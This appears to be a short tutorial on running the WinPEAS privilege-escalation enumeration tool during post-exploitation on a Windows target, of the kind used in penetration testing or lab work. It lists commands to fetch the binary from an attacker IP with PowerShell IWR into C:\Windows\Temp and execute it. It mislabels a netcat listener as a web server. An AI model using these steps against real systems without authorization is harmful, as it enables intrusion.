WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. This writing is about how to run it, and, complete Post-Exploitation activities
How to
1. Download the script from GitHub (https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
- git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
- cd privilege-escalation-awesome-scripts-suite
2. Navigate through the directories to find the binary files
- cd winPEAS/winPEASexe/binaries/
- ls
3. Depending on the type of machine you need to use x64 or x86, This demo will be used on a x64 machine, so, I choose that one
- cd x64/Release
- ls
4. There we have our executable script winPEASx64.exe. We now need to find a way to move it to our target machine and execute it
5. We will start a web server at the binary location
- nc -lvp 9999
6. From the remote server I will use Powershell (IWR), you can also use cmd (certutil)
- cd C:\Windows\Temp
- IWR http://10.10.14.10:9999/winPEASx64.exe -OutFile winPEASx64.exe
- dir
7. Now that it is in the server, execute it
- .\winPEASx64.exe
8. Now you can start inspecting the data
Extra
1. Sometimes it is better to try .bat file if the .exe is failing
- powershell.exe IWR http://192.168.0.12:9999/winPEAS.bat -OutFile winPEAS.bat
- dir
2. Run the app
- .\winPEAS.bat